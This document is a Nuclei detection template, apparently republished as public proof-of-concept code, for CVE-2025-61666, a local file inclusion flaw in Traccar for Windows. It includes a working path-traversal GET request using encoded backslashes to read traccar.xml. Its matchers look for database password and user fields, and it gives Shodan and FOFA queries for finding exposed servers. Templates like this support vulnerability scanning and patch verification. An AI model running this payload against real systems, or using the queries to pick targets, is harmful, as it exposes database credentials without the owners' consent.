Traccar 5.8-6.0 (non-default installs with web.override set) and 6.1-6.8.1 (default installs) contain a local file inclusion vulnerability caused by enabled web override configuration, letting unauthenticated attackers leak arbitrary files including passwords, exploit requires local access.
PoC代码[已公开]
id: CVE-2025-61666
info:
name: Traccar(Windows) 6.1- 6.8.1 - Local File Inclusion
author: securitytaters
severity: high
description: |
Traccar 5.8-6.0 (non-default installs with web.override set) and 6.1-6.8.1 (default installs) contain a local file inclusion vulnerability caused by enabled web override configuration, letting unauthenticated attackers leak arbitrary files including passwords, exploit requires local access.
impact: |
Unauthenticated local attackers can read arbitrary files, potentially exposing sensitive information like passwords and configuration data.
remediation: |
Upgrade to version 6.9.0 or later.
reference:
- https://github.com/traccar/traccar/security/advisories/GHSA-hprc-rph8-fj87
- https://projectblack.io/blog/jetty-addpath-lfi/
metadata:
verified: true
max-request: 1
shodan-query: html:"Traccar"
fofa-query: app="Traccar"
tags: cve,cve2025,traccar,lfi,vuln
http:
- raw:
- |
GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(content_type, "application/xml")'
- 'contains_all(body, "database.driver","database.password","database.user")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502207340ebd5cdafb38a4ff1a63758e1421f0d78cf73864d5d029b687b5f4dfb3cfd02210087c2e65e1fb09892d27be8dfb27613967d93c91c46f2a37d8062a3726bb8eef9:922c64590222798bb761d5b6d8e72950